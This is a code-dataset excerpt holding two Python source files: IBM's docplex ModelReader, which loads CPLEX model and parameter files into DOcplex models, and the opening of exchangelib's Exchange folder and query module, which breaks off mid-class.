py | b403415322ed0e72af05a25154aebef25eabefd5 | # --------------------------------------------------------------------------
# Source file provided under Apache License, Version 2.0, January 2004,
# http://www.apache.org/licenses/
# (c) Copyright IBM Corp. 2015, 2016
# --------------------------------------------------------------------------
import os
# docplex
from docplex.mp.model import Model
from docplex.mp.utils import DOcplexException
from docplex.mp.params.cplex_params import get_params_from_cplex_version
from docplex.mp.constants import ComparisonType
from docplex.mp.constr import LinearConstraint
from docplex.mp.cplex_adapter import CplexAdapter
from docplex.mp.compat23 import izip
from docplex.mp.quad import VarPair
class ModelReaderError(DOcplexException):
pass
class _CplexReaderFileContext(object):
def __init__(self, filename, read_method=None):
self._cplex = None
self._filename = filename
self._read_method = read_method or ["read"]
def __enter__(self):
self.cpx_adapter = CplexAdapter()
cpx = self.cpx_adapter.cpx
# no output from CPLEX
cpx.set_results_stream(None)
cpx.set_log_stream(None)
cpx.set_warning_stream(None)
cpx.set_error_stream(None)
self_read_fn = cpx
for m in self._read_method:
self_read_fn = self_read_fn.__getattribute__(m)
try:
self_read_fn(self._filename)
self._cplex = cpx
return self.cpx_adapter
except self.cpx_adapter.CplexError as cpx_e: # pragma: no cover
# delete cplex instance
del cpx
raise ModelReaderError("*CPLEX error {0!s} reading file {1} - exiting".format(cpx_e, self._filename))
# noinspection PyUnusedLocal
def __exit__(self, exc_type, exc_val, exc_tb):
cpx = self._cplex
if cpx is not None:
del cpx
self._cplex = None
# noinspection PyArgumentList
class ModelReader(object):
""" This class is used to read models from CPLEX files (e.g. SAV, LP, MPS)
Note:
This class requires CPLEX to be installed and present in ``PYTHONPATH``. The following file formats are
accepted: LP, SAV, MPS.
Example:
Use the class method ``read`` to read a model file.
Reads the contents of file ``mymodel.lp`` into an `AdvModel` instance, built with the context `my_ctx`,
with the parameter ``ignore_names`` set to True::
m = ModelReader.read(path='mymodel.lp', model_class=AdvModel, context=my_ctx, ignore_names=True)
"""
@staticmethod
def _build_linear_expr_from_sparse_pair(lfactory, var_map, cpx_sparsepair):
expr = lfactory.linear_expr(arg=0, safe=True)
for ix, k in izip(cpx_sparsepair.ind, cpx_sparsepair.val):
dv = var_map[ix]
expr._add_term(dv, k)
return expr
_sense2comp_dict = {'L': ComparisonType.LE, 'E': ComparisonType.EQ, 'G': ComparisonType.GE}
# noinspection PyDefaultArgument
@classmethod
def parse_sense(cls, cpx_sense, sense_dict=_sense2comp_dict):
return sense_dict.get(cpx_sense)
@classmethod
def read_prm(cls, filename):
""" Reads a CPLEX PRM file.
Reads a CPLEX parameters file and returns a DOcplex parameter group
instance. This parameter object can be used in a solve().
Args:
filename: a path string
Returns:
A `RootParameterGroup object`, if the read operation succeeds, else None.
"""
# TODO: Clean up - now creating an adapter raise importError if CPLEX not found
# if not Cplex: # pragma: no cover
# raise RuntimeError("ModelReader.read_prm() requires CPLEX runtime.")
with _CplexReaderFileContext(filename, read_method=["parameters", "read_file"]) as adapter:
cpx = adapter.cpx
if cpx:
# raw parameters
params = get_params_from_cplex_version(cpx.get_version())
for param in params:
try:
cpx_value = cpx._env.parameters._get(param.cpx_id)
if cpx_value != param.default_value:
param.set(cpx_value)
except adapter.CplexError: # pragma: no cover
pass
return params
else: # pragma: no cover
return None
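    # Hedged usage sketch for read_prm (added; the .prm path and the model
    # variable are illustrative assumptions):
    #
    #   params = ModelReader.read_prm("my_settings.prm")
    #   mdl.solve(cplex_parameters=params)   # pass the parameter group to a solve()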
@staticmethod
def _safe_call_get_names(cpx_adapter, get_names_fn, fallback_names=None):
# cplex crashes when calling get_names on some files (e.g. SAV)
# in this case filter out error 1219
# and return a fallback list with None or ""
try:
names = get_names_fn()
return names
# except TypeError:
# print("** type error ignored in call to {0}".format(get_names_fn.__name__))
# return fallback_names or []
except cpx_adapter.CplexSolverError as cpxse: # pragma: no cover
errcode = cpxse.args[2]
# when all indicators have no names, cplex raises this error
# CPLEX Error 1219: No names exist.
if errcode == 1219:
return fallback_names or []
else:
# this is something else
raise
@classmethod
def _read_cplex(cls, filename, silent=True):
cpx_adapter = CplexAdapter()
cpx = cpx_adapter.cpx
# no warnings
if silent:
cpx.set_results_stream(None)
cpx.set_log_stream(None)
cpx.set_warning_stream(None)
cpx.set_error_stream(None) # remove messages about names
try:
cpx.read(filename)
return cpx_adapter
except cpx_adapter.CplexError as cpx_e:
raise ModelReaderError("*CPLEX error {0!s} reading file {1} - exiting".format(cpx_e, filename))
@classmethod
def _make_expr_from_coef_vector(cls, mdl, index_2var_map, coeffs, offset):
all_obj_vars = []
all_obj_coefs = []
for v in range(mdl.number_of_variables):
if v in index_2var_map:
obj_coeff = coeffs[v]
if obj_coeff:
all_obj_coefs.append(obj_coeff)
all_obj_vars.append(index_2var_map[v])
expr = mdl._aggregator._scal_prod(all_obj_vars, all_obj_coefs)
if offset:
expr += offset
return expr
@classmethod
def _make_expr_from_vars_coefs(cls, mdl, dvars, coefs, offset=0):
terms_dict = mdl._lfactory._new_term_dict()
for dv, k in izip(dvars, coefs):
if k:
terms_dict[dv] = k
return mdl._lfactory.linear_expr(arg=terms_dict, constant=offset, safe=True)
@classmethod
def _make_expr_from_varmap_coefs(cls, lfactory, varmap, dvarxs, coefs, offset=0):
terms_dict = lfactory._new_term_dict()
for dvx, k in izip(dvarxs, coefs):
dv = varmap.get(dvx)
if dv is not None:
terms_dict[dv] = k
return lfactory.linear_expr(arg=terms_dict, constant=offset, safe=True)
@classmethod
def read(cls, filename, model_name=None, verbose=False, model_class=None, **kwargs):
""" Reads a model from a CPLEX export file.
Accepts all formats exported by CPLEX: LP, SAV, MPS.
If an error occurs while reading the file, the message of the exception
is printed and the function returns None.
Args:
filename: The file to read.
model_name: An optional name for the newly created model. If None,
the model name will be the path basename.
verbose: An optional flag to print informative messages, default is False.
model_class: An optional class type; must be a subclass of Model.
The returned model is built using this model_class and the keyword arguments kwargs, if any.
By default, the model class is `Model` (see :class:`docplex.mp.model.Model`).
kwargs: A dict of keyword-based arguments that are used when creating the model
instance.
Example:
`m = read_model("c:/temp/foo.mps", model_name="docplex_foo", solver_agent="docloud", output_level=100)`
Returns:
An instance of Model, or None if an exception is raised.
See Also:
:class:`docplex.mp.model.Model`
"""
if not os.path.exists(filename):
raise IOError("* file not found: {0}".format(filename))
# extract basename
if model_name:
name_to_use = model_name
else:
basename = os.path.basename(filename)
if '.' not in filename:
raise RuntimeError('ModelReader.read_model(): path has no extension: {}'.format(filename))
dotpos = basename.find(".")
if dotpos > 0:
name_to_use = basename[:dotpos]
else: # pragma: no cover
name_to_use = basename
model_class = model_class or Model
if 0 == os.stat(filename).st_size:
print("* file is empty: {0} - exiting".format(filename))
return model_class(name=name_to_use, **kwargs)
if verbose:
print("-> CPLEX starts reading file: {0}".format(filename))
cpx_adapter = cls._read_cplex(filename)
cpx = cpx_adapter.cpx
if verbose:
print("<- CPLEX finished reading file: {0}".format(filename))
if not cpx: # pragma: no cover
return None
final_output_level = kwargs.get("output_level", "info")
debug_read = kwargs.get("debug", False)
try:
# force no tck
if 'checker' in kwargs:
final_checker = kwargs['checker']
else:
final_checker = 'default'
# build the model with no checker, then restore final_checker in the end.
kwargs['checker'] = 'off'
ignore_names = kwargs.get('ignore_names', False)
# -------------
mdl = model_class(name=name_to_use, **kwargs)
lfactory = mdl._lfactory
qfactory = mdl._qfactory
mdl.set_quiet() # output level set to ERROR
vartype_cont = mdl.continuous_vartype
vartype_map = {'B': mdl.binary_vartype,
'I': mdl.integer_vartype,
'C': mdl.continuous_vartype,
'S': mdl.semicontinuous_vartype}
# 1 upload variables
cpx_nb_vars = cpx.variables.get_num()
def make_constant_expr(k):
if k:
return lfactory._new_safe_constant_expr(k)
else:
return lfactory.new_zero_expr()
if verbose:
print("-- uploading {0} variables...".format(cpx_nb_vars))
cpx_var_names = [] if ignore_names else cls._safe_call_get_names(cpx_adapter,
cpx.variables.get_names)
if cpx._is_MIP():
cpx_vartypes = [vartype_map.get(cpxt, vartype_cont) for cpxt in cpx.variables.get_types()]
else:
cpx_vartypes = [vartype_cont] * cpx_nb_vars
cpx_var_lbs = cpx.variables.get_lower_bounds()
cpx_var_ubs = cpx.variables.get_upper_bounds()
# map from cplex variable indices to docplex's
# use to skip range vars
# cplex : [x, Rg1, y] -> {0:0, 2: 1}
if cpx_var_names:
model_varnames = cpx_var_names
else:
model_varnames = [None] * cpx_nb_vars
model_lbs = cpx_var_lbs
model_ubs = cpx_var_ubs
model_types = cpx_vartypes
# vars
model_vars = lfactory.new_multitype_var_list(cpx_nb_vars,
model_types,
model_lbs,
model_ubs,
model_varnames)
# inverse map from indices to docplex vars
cpx_var_index_to_docplex = {v: model_vars[v] for v in range(cpx_nb_vars)}
# 2. upload linear constraints and ranges (mixed in cplex)
cpx_linearcts = cpx.linear_constraints
nb_linear_cts = cpx_linearcts.get_num()
# all_rows1 = cpx_linearcts.get_rows()
all_rows = cpx_adapter.fast_get_rows(cpx)
all_rhs = cpx_linearcts.get_rhs()
all_senses = cpx_linearcts.get_senses()
all_range_values = cpx_linearcts.get_range_values()
cpx_ctnames = [] if ignore_names else cls._safe_call_get_names(cpx_adapter,
cpx_linearcts.get_names)
deferred_cts = []
if verbose:
print("-- uploading {0} linear constraints...".format(nb_linear_cts))
for c in range(nb_linear_cts):
row = all_rows[c]
sense = all_senses[c]
rhs = all_rhs[c]
ctname = cpx_ctnames[c] if cpx_ctnames else None
range_val = all_range_values[c]
indices, coefs = row
expr = cls._make_expr_from_varmap_coefs(lfactory, cpx_var_index_to_docplex, indices, coefs)
if sense == 'R':
# rangeval can be negative !!! issue 52
if range_val >= 0:
range_lb = rhs
range_ub = rhs + range_val
else:
range_ub = rhs
range_lb = rhs + range_val
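# Illustrative values: rhs=10, range_val=5 gives lb=10, ub=15, while rhs=10,
# range_val=-3 gives lb=7, ub=10, so lb <= ub holds in both cases.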
rgct = mdl.range_constraint(lb=range_lb, ub=range_ub, expr=expr, rng_name=ctname)
deferred_cts.append(rgct)
else:
op = cls.parse_sense(sense)
rhs_expr = make_constant_expr(rhs)
ct = LinearConstraint(mdl, expr, op, rhs_expr, ctname)
deferred_cts.append(ct)
if deferred_cts:
# add constraint as a block
lfactory._post_constraint_block(posted_cts=deferred_cts)
# 3. upload Quadratic constraints
cpx_quadraticcts = cpx.quadratic_constraints
nb_quadratic_cts = cpx_quadraticcts.get_num()
if nb_quadratic_cts:
all_rhs = cpx_quadraticcts.get_rhs()
all_linear_nb_non_zeros = cpx_quadraticcts.get_linear_num_nonzeros()
all_linear_components = cpx_quadraticcts.get_linear_components()
all_quadratic_nb_non_zeros = cpx_quadraticcts.get_quad_num_nonzeros()
all_quadratic_components = cpx_quadraticcts.get_quadratic_components()
all_senses = cpx_quadraticcts.get_senses()
cpx_ctnames = [] if ignore_names else cls._safe_call_get_names(cpx_adapter,
cpx_quadraticcts.get_names)
for c in range(nb_quadratic_cts):
rhs = all_rhs[c]
linear_nb_non_zeros = all_linear_nb_non_zeros[c]
linear_component = all_linear_components[c]
quadratic_nb_non_zeros = all_quadratic_nb_non_zeros[c]
quadratic_component = all_quadratic_components[c]
sense = all_senses[c]
ctname = cpx_ctnames[c] if cpx_ctnames else None
if linear_nb_non_zeros > 0:
indices, coefs = linear_component.unpack()
# linexpr = mdl._aggregator._scal_prod((cpx_var_index_to_docplex[idx] for idx in indices), coefs)
linexpr = cls._make_expr_from_varmap_coefs(lfactory, cpx_var_index_to_docplex, indices, coefs)
else:
linexpr = None
if quadratic_nb_non_zeros > 0:
qfactory = mdl._qfactory
ind1, ind2, coefs = quadratic_component.unpack()
quads = qfactory.term_dict_type()
for idx1, idx2, coef in izip(ind1, ind2, coefs):
quads[VarPair(cpx_var_index_to_docplex[idx1], cpx_var_index_to_docplex[idx2])] = coef
else: # pragma: no cover
# should not happen, but who knows
quads = None
quad_expr = mdl._aggregator._quad_factory.new_quad(quads=quads, linexpr=linexpr, safe=True)
op = ComparisonType.cplex_ctsense_to_python_op(sense)
ct = op(quad_expr, rhs)
mdl.add_constraint(ct, ctname)
# 4. upload indicators
cpx_indicators = cpx.indicator_constraints
nb_indicators = cpx_indicators.get_num()
if nb_indicators:
all_ind_names = [] if ignore_names else cls._safe_call_get_names(cpx_adapter,
cpx_indicators.get_names)
all_ind_bvars = cpx_indicators.get_indicator_variables()
all_ind_rhs = cpx_indicators.get_rhs()
all_ind_linearcts = cpx_indicators.get_linear_components()
all_ind_senses = cpx_indicators.get_senses()
all_ind_complemented = cpx_indicators.get_complemented()
all_ind_types = cpx_indicators.get_types()
ind_equiv_type = 3
for i in range(nb_indicators):
ind_bvar = all_ind_bvars[i]
ind_name = all_ind_names[i] if all_ind_names else None
ind_rhs = all_ind_rhs[i]
ind_linear = all_ind_linearcts[i] # SparsePair(ind, val)
ind_sense = all_ind_senses[i]
ind_complemented = all_ind_complemented[i]
ind_type = all_ind_types[i]
# 1. check the bvar is ok
ind_bvar = cpx_var_index_to_docplex[ind_bvar]
# each var appears once
ind_linexpr = cls._build_linear_expr_from_sparse_pair(lfactory, cpx_var_index_to_docplex,
ind_linear)
op = ComparisonType.cplex_ctsense_to_python_op(ind_sense)
ind_lct = op(ind_linexpr, ind_rhs)
if ind_type == ind_equiv_type:
logct = lfactory.new_equivalence_constraint(
ind_bvar, ind_lct, true_value=1 - ind_complemented, name=ind_name)
else:
logct = lfactory.new_indicator_constraint(
ind_bvar, ind_lct, true_value=1 - ind_complemented, name=ind_name)
mdl.add(logct)
# 5. upload Piecewise linear constraints
try:
cpx_pwl = cpx.pwl_constraints
cpx_pwl_defs = cpx_pwl.get_definitions()
pwl_fallback_names = [""] * cpx_pwl.get_num()
cpx_pwl_names = pwl_fallback_names if ignore_names else cls._safe_call_get_names(cpx_adapter,
cpx_pwl.get_names,
pwl_fallback_names)
for (vary_idx, varx_idx, preslope, postslope, breakx, breaky), pwl_name in izip(cpx_pwl_defs,
cpx_pwl_names):
varx = cpx_var_index_to_docplex.get(varx_idx, None)
vary = cpx_var_index_to_docplex.get(vary_idx, None)
breakxy = [(brkx, brky) for brkx, brky in zip(breakx, breaky)]
pwl_func = mdl.piecewise(preslope, breakxy, postslope, name=pwl_name)
pwl_expr = mdl._lfactory.new_pwl_expr(pwl_func, varx, 0, add_counter_suffix=False, resolve=False)
pwl_expr._f_var = vary
pwl_expr._ensure_resolved()
except AttributeError: # pragma: no cover
pass # Do not check for PWLs if Cplex version does not support them
# 6. upload objective
# noinspection PyPep8
try:
cpx_multiobj = cpx.multiobj
except AttributeError: # pragma: no cover
# pre-12.9 version
cpx_multiobj = None
if cpx_multiobj is None or cpx_multiobj.get_num() <= 1:
cpx_obj = cpx.objective
cpx_sense = cpx_obj.get_sense()
cpx_all_lin_obj_coeffs = cpx_obj.get_linear()
all_obj_vars = []
all_obj_coefs = []
for v in range(cpx_nb_vars):
if v in cpx_var_index_to_docplex:
obj_coeff = cpx_all_lin_obj_coeffs[v]
all_obj_coefs.append(obj_coeff)
all_obj_vars.append(cpx_var_index_to_docplex[v])
# obj_expr = mdl._aggregator._scal_prod(all_obj_vars, all_obj_coefs)
obj_expr = cls._make_expr_from_vars_coefs(mdl, all_obj_vars, all_obj_coefs)
if cpx_obj.get_num_quadratic_variables() > 0:
cpx_all_quad_cols_coeffs = cpx_obj.get_quadratic()
quads = qfactory.term_dict_type()
for v, col_coefs in izip(cpx_var_index_to_docplex, cpx_all_quad_cols_coeffs):
var1 = cpx_var_index_to_docplex[v]
indices, coefs = col_coefs.unpack()
for idx, coef in izip(indices, coefs):
vp = VarPair(var1, cpx_var_index_to_docplex[idx])
quads[vp] = quads.get(vp, 0) + coef / 2
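# The halving above compensates for CPLEX reporting the full symmetric quadratic
# matrix (under its 1/2 x'Qx objective convention), so each product term ends up
# with its docplex-style coefficient.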
obj_expr += qfactory.new_quad(quads=quads, linexpr=None)
obj_expr += cpx.objective.get_offset()
is_maximize = cpx_sense == cpx_adapter.cplex_module._internal._subinterfaces.ObjSense.maximize
if is_maximize:
mdl.maximize(obj_expr)
else:
mdl.minimize(obj_expr)
else:
# we have multiple objective
nb_multiobjs = cpx_multiobj.get_num()
exprs = [0] * nb_multiobjs
priorities = [1] * nb_multiobjs
weights = [1] * nb_multiobjs
abstols = [0] * nb_multiobjs
reltols = [0] * nb_multiobjs
names = cpx_multiobj.get_names()
for m in range(nb_multiobjs):
(obj_coeffs, obj_offset, weight, prio, abstol, reltol) = cpx_multiobj.get_definition(m)
obj_expr = cls._make_expr_from_coef_vector(mdl, cpx_var_index_to_docplex, obj_coeffs, obj_offset)
exprs[m] = obj_expr
priorities[m] = prio
weights[m] = weight
abstols[m] = abstol
reltols[m] = reltol
sense = cpx_multiobj.get_sense()
mdl.set_multi_objective(sense, exprs, priorities, weights, abstols, reltols, names)
# upload sos
cpx_sos = cpx.SOS
cpx_sos_num = cpx_sos.get_num()
if cpx_sos_num > 0:
cpx_sos_types = cpx_sos.get_types()
cpx_sos_indices = cpx_sos.get_sets()
cpx_sos_names = cpx_sos.get_names()
if not cpx_sos_names:
cpx_sos_names = [None] * cpx_sos_num
for sostype, sos_sparse, sos_name in izip(cpx_sos_types, cpx_sos_indices, cpx_sos_names):
sos_var_indices = sos_sparse.ind
sos_weights = sos_sparse.val
isostype = int(sostype)
sos_vars = [cpx_var_index_to_docplex[var_ix] for var_ix in sos_var_indices]
mdl.add_sos(dvars=sos_vars, sos_arg=isostype, name=sos_name, weights=sos_weights)
# upload lazy constraints
cpx_linear_advanced = cpx.linear_constraints.advanced
cpx_lazyct_num = cpx_linear_advanced.get_num_lazy_constraints()
if cpx_lazyct_num:
print("WARNING: found {0} lazy constraints that cannot be uploaded to DOcplex".format(cpx_lazyct_num))
mdl.output_level = final_output_level
if final_checker:
# need to restore checker
mdl.set_checker(final_checker)
except cpx_adapter.CplexError as cpx_e: # pragma: no cover
print("* CPLEX error: {0!s} reading file {1}".format(cpx_e, filename))
mdl = None
if debug_read:
raise
except ModelReaderError as mre: # pragma: no cover
print("! Model reader error: {0!s} while reading file {1}".format(mre, filename))
mdl = None
if debug_read:
raise
except DOcplexException as doe: # pragma: no cover
print("! Internal DOcplex error: {0!s} while reading file {1}".format(doe, filename))
mdl = None
if debug_read:
raise
# except Exception as any_e: # pragma: no cover
# print("Internal exception raised: {0} msg={1!s} while reading file '{2}'".format(type(any_e), any_e, filename))
# mdl = None
# if debug_read:
# raise
finally:
# clean up CPLEX instance...
cpx.end()
return mdl
@classmethod
def read_model(cls, filename, model_name=None, verbose=False, model_class=None, **kwargs):
""" This method is a synonym of `read` for compatibility.
"""
import warnings
warnings.warn("ModelReader.read_model is deprecated, use class method ModelReader.read()", DeprecationWarning)
return cls.read(filename, model_name, verbose, model_class, **kwargs)
|
py | b403423959461025f61cde8fc909ce71d53c4084 | # coding=utf-8
from __future__ import unicode_literals
from fnmatch import fnmatch
import logging
from operator import attrgetter
import warnings
from cached_property import threaded_cached_property
from future.utils import python_2_unicode_compatible, PY2
from six import text_type, string_types
from .errors import ErrorAccessDenied, ErrorFolderNotFound, ErrorCannotEmptyFolder, ErrorCannotDeleteObject, \
ErrorNoPublicFolderReplicaAvailable, ErrorInvalidOperation, ErrorDeleteDistinguishedFolder, ErrorItemNotFound
from .fields import IntegerField, TextField, DateTimeField, FieldPath, EffectiveRightsField, MailboxField, IdField, \
EWSElementField, Field
from .items import Item, CalendarItem, Contact, Message, Task, MeetingRequest, MeetingResponse, MeetingCancellation, \
DistributionList, RegisterMixIn, Persona, ITEM_CLASSES, ITEM_TRAVERSAL_CHOICES, SHAPE_CHOICES, ID_ONLY, \
DELETE_TYPE_CHOICES, HARD_DELETE
from .properties import ItemId, Mailbox, EWSElement, ParentFolderId, InvalidField
from .queryset import QuerySet, SearchableMixIn
from .restriction import Restriction, Q
from .services import FindFolder, GetFolder, FindItem, CreateFolder, UpdateFolder, DeleteFolder, EmptyFolder, FindPeople
from .util import TNS, MNS
from .version import EXCHANGE_2007_SP1, EXCHANGE_2010_SP1, EXCHANGE_2013, EXCHANGE_2013_SP1
log = logging.getLogger(__name__)
# Traversal enums
SHALLOW = 'Shallow'
SOFT_DELETED = 'SoftDeleted'
DEEP = 'Deep'
FOLDER_TRAVERSAL_CHOICES = (SHALLOW, DEEP, SOFT_DELETED)
class FolderId(ItemId):
# MSDN: https://msdn.microsoft.com/en-us/library/office/aa579461(v=exchg.150).aspx
ELEMENT_NAME = 'FolderId'
__slots__ = ItemId.__slots__
class DistinguishedFolderId(ItemId):
# MSDN: https://msdn.microsoft.com/en-us/library/office/aa580808(v=exchg.150).aspx
ELEMENT_NAME = 'DistinguishedFolderId'
FIELDS = [
IdField('id', field_uri=ItemId.ID_ATTR, is_required=True),
IdField('changekey', field_uri=ItemId.CHANGEKEY_ATTR),
MailboxField('mailbox'),
]
__slots__ = ItemId.__slots__ + ('mailbox',)
def clean(self, version=None):
super(DistinguishedFolderId, self).clean(version=version)
if self.id == PublicFoldersRoot.DISTINGUISHED_FOLDER_ID:
# Avoid "ErrorInvalidOperation: It is not valid to specify a mailbox with the public folder root" from EWS
self.mailbox = None
class CalendarView(EWSElement):
"""
MSDN: https://msdn.microsoft.com/en-US/library/office/aa564515%28v=exchg.150%29.aspx
"""
ELEMENT_NAME = 'CalendarView'
NAMESPACE = MNS
FIELDS = [
DateTimeField('start', field_uri='StartDate', is_required=True, is_attribute=True),
DateTimeField('end', field_uri='EndDate', is_required=True, is_attribute=True),
IntegerField('max_items', field_uri='MaxEntriesReturned', min=1, is_attribute=True),
]
__slots__ = ('start', 'end', 'max_items')
def clean(self, version=None):
super(CalendarView, self).clean(version=version)
if self.end < self.start:
raise ValueError("'start' must be before 'end'")
class FolderCollection(SearchableMixIn):
def __init__(self, account, folders):
""" Implements a search API on a collection of folders
:param account: An Account object
:param folders: An iterable of folders, e.g. Folder.walk(), Folder.glob(), or [a.calendar, a.inbox]
"""
self.account = account
self._folders = folders
@threaded_cached_property
def folders(self):
# Resolve the list of folders, in case it's a generator
return list(self._folders)
def __len__(self):
return len(self.folders)
def __iter__(self):
for f in self.folders:
yield f
def get(self, *args, **kwargs):
return QuerySet(self).get(*args, **kwargs)
def all(self):
return QuerySet(self).all()
def none(self):
return QuerySet(self).none()
def filter(self, *args, **kwargs):
"""
Finds items in the folder(s).
Non-keyword args may be a list of Q instances.
Optional extra keyword arguments follow a Django-like QuerySet filter syntax (see
https://docs.djangoproject.com/en/1.10/ref/models/querysets/#field-lookups).
We don't support '__year' and other date-related lookups. We also don't support '__endswith' or '__iendswith'.
We support the additional '__not' lookup in place of Django's exclude() for simple cases. For more complicated
cases you need to create a Q object and use ~Q().
Examples:
my_account.inbox.filter(datetime_received__gt=EWSDateTime(2016, 1, 1))
my_account.calendar.filter(start__range=(EWSDateTime(2016, 1, 1), EWSDateTime(2017, 1, 1)))
my_account.tasks.filter(subject='Hi mom')
my_account.tasks.filter(subject__not='Hi mom')
my_account.tasks.filter(subject__contains='Foo')
my_account.tasks.filter(subject__icontains='foo')
'endswith' and 'iendswith' could be emulated by searching with 'contains' or 'icontains' and then
post-processing items. Fetch the field in question with additional_fields and remove items where the search
string is not a postfix.
"""
return QuerySet(self).filter(*args, **kwargs)
def exclude(self, *args, **kwargs):
return QuerySet(self).exclude(*args, **kwargs)
def view(self, start, end, max_items=None, *args, **kwargs):
""" Implements the CalendarView option to FindItem. The difference between filter() and view() is that filter()
only returns the master CalendarItem for recurring items, while view() unfolds recurring items and returns all
CalendarItem occurrences as one would normally expect when presenting a calendar.
Supports the same semantics as filter, except for 'start' and 'end' keyword attributes which are both required
and behave differently than filter. Here, they denote the start and end of the timespan of the view. All items
that overlap the timespan are returned (items that end exactly on 'start' are also returned, for some reason).
EWS does not allow combining CalendarView with search restrictions (filter and exclude).
'max_items' defines the maximum number of items returned in this view. Optional.
"""
qs = QuerySet(self).filter(*args, **kwargs)
qs.calendar_view = CalendarView(start=start, end=end, max_items=max_items)
return qs
def allowed_item_fields(self):
# Return non-ID fields of all item classes allowed in this folder type
fields = set()
for item_model in self.supported_item_models:
fields.update(set(item_model.supported_fields(version=self.account.version)))
return fields
@property
def supported_item_models(self):
return tuple(item_model for folder in self.folders for item_model in folder.supported_item_models)
def validate_item_field(self, field):
# For each field, check if the field is valid for any of the item models supported by this folder
for item_model in self.supported_item_models:
try:
item_model.validate_field(field=field, version=self.account.version)
break
except InvalidField:
continue
else:
raise InvalidField("%r is not a valid field on %s" % (field, self.supported_item_models))
def find_items(self, q, shape=ID_ONLY, depth=SHALLOW, additional_fields=None, order_fields=None,
calendar_view=None, page_size=None, max_items=None, offset=0):
"""
Private method to call the FindItem service
:param q: a Q instance containing any restrictions
:param shape: controls whether to return (id, changekey) tuples or Item objects. If additional_fields is
non-null, we always return Item objects.
:param depth: controls whether to return soft-deleted items or not.
:param additional_fields: the extra properties we want on the return objects. Default is no properties. Be
aware that complex fields can only be fetched with fetch() (i.e. the GetItem service).
:param order_fields: the SortOrder fields, if any
:param calendar_view: a CalendarView instance, if any
:param page_size: the requested number of items per page
:param max_items: the max number of items to return
:param offset: the offset relative to the first item in the item collection
:return: a generator for the returned item IDs or items
"""
if shape not in SHAPE_CHOICES:
raise ValueError("'shape' %s must be one of %s" % (shape, SHAPE_CHOICES))
if depth not in ITEM_TRAVERSAL_CHOICES:
raise ValueError("'depth' %s must be one of %s" % (depth, ITEM_TRAVERSAL_CHOICES))
if not self.folders:
log.debug('Folder list is empty')
return
if additional_fields:
for f in additional_fields:
self.validate_item_field(field=f)
for f in additional_fields:
if f.field.is_complex:
raise ValueError("find_items() does not support field '%s'. Use fetch() instead" % f.field.name)
if calendar_view is not None and not isinstance(calendar_view, CalendarView):
raise ValueError("'calendar_view' %s must be a CalendarView instance" % calendar_view)
# Build up any restrictions
if q.is_empty():
restriction = None
query_string = None
elif q.query_string:
restriction = None
query_string = Restriction(q, folders=self.folders, applies_to=Restriction.ITEMS)
else:
restriction = Restriction(q, folders=self.folders, applies_to=Restriction.ITEMS)
query_string = None
log.debug(
'Finding items in folders %s of account %s (shape: %s, depth: %s, additional_fields: %s, restriction: %s)',
self.folders,
self.account,
shape,
depth,
additional_fields,
restriction.q if restriction else None,
)
items = FindItem(account=self.account, folders=self.folders, chunk_size=page_size).call(
additional_fields=additional_fields,
restriction=restriction,
order_fields=order_fields,
shape=shape,
query_string=query_string,
depth=depth,
calendar_view=calendar_view,
max_items=calendar_view.max_items if calendar_view else max_items,
offset=offset,
)
if shape == ID_ONLY and additional_fields is None:
for i in items:
yield i if isinstance(i, Exception) else Item.id_from_xml(i)
else:
for i in items:
if isinstance(i, Exception):
yield i
else:
yield Folder.item_model_from_tag(i.tag).from_xml(elem=i, account=self.account)
def _get_folder_fields(self):
additional_fields = set()
for folder in self.folders:
if isinstance(folder, Folder):
additional_fields.update(
FieldPath(field=f) for f in folder.supported_fields(version=self.account.version)
)
else:
additional_fields.update(
FieldPath(field=f) for f in Folder.supported_fields(version=self.account.version)
)
return additional_fields
def find_folders(self, q=None, shape=ID_ONLY, depth=DEEP, page_size=None, max_items=None, offset=0):
# 'depth' controls whether to return direct children or recurse into sub-folders
if not self.account:
raise ValueError('Folder must have an account')
if q is None or q.is_empty():
restriction = None
else:
restriction = Restriction(q, folders=self.folders, applies_to=Restriction.FOLDERS)
if shape not in SHAPE_CHOICES:
raise ValueError("'shape' %s must be one of %s" % (shape, SHAPE_CHOICES))
if depth not in FOLDER_TRAVERSAL_CHOICES:
raise ValueError("'depth' %s must be one of %s" % (depth, FOLDER_TRAVERSAL_CHOICES))
if not self.folders:
log.debug('Folder list is empty')
return []
additional_fields = self._get_folder_fields()
return FindFolder(account=self.account, folders=self.folders, chunk_size=page_size).call(
additional_fields=additional_fields,
restriction=restriction,
shape=shape,
depth=depth,
max_items=max_items,
offset=offset,
)
def get_folders(self):
if not self.folders:
log.debug('Folder list is empty')
return []
additional_fields = self._get_folder_fields()
return GetFolder(account=self.account).call(
folders=self.folders,
additional_fields=additional_fields,
shape=ID_ONLY,
)
@python_2_unicode_compatible
class Folder(RegisterMixIn, SearchableMixIn):
"""
MSDN: https://msdn.microsoft.com/en-us/library/office/aa581334(v=exchg.150).aspx
"""
ELEMENT_NAME = 'Folder'
NAMESPACE = TNS
DISTINGUISHED_FOLDER_ID = None # See https://msdn.microsoft.com/en-us/library/office/aa580808(v=exchg.150).aspx
# Default item type for this folder. See http://msdn.microsoft.com/en-us/library/hh354773(v=exchg.80).aspx
CONTAINER_CLASS = None
supported_item_models = ITEM_CLASSES # The Item types that this folder can contain. Default is all
# Marks the version from which a distinguished folder was introduced. A possibly authoritative source is:
# https://github.com/OfficeDev/ews-managed-api/blob/master/Enumerations/WellKnownFolderName.cs
supported_from = None
LOCALIZED_NAMES = dict() # A map of (str)locale: (tuple)localized_folder_names
ITEM_MODEL_MAP = {cls.response_tag(): cls for cls in ITEM_CLASSES}
FIELDS = [
IdField('id', field_uri=FolderId.ID_ATTR),
IdField('changekey', field_uri=FolderId.CHANGEKEY_ATTR),
EWSElementField('parent_folder_id', field_uri='folder:ParentFolderId', value_cls=ParentFolderId,
is_read_only=True),
TextField('folder_class', field_uri='folder:FolderClass', is_required_after_save=True),
TextField('name', field_uri='folder:DisplayName'),
IntegerField('total_count', field_uri='folder:TotalCount', is_read_only=True),
IntegerField('child_folder_count', field_uri='folder:ChildFolderCount', is_read_only=True),
IntegerField('unread_count', field_uri='folder:UnreadCount', is_read_only=True),
EffectiveRightsField('effective_rights', field_uri='folder:EffectiveRights', is_read_only=True),
]
# Used to register extended properties
INSERT_AFTER_FIELD = 'child_folder_count'
def __init__(self, **kwargs):
self.root = kwargs.pop('root', None) # This is a pointer to the root of the folder hierarchy
self.is_distinguished = kwargs.pop('is_distinguished', False)
parent = kwargs.pop('parent', None)
if parent:
if self.root:
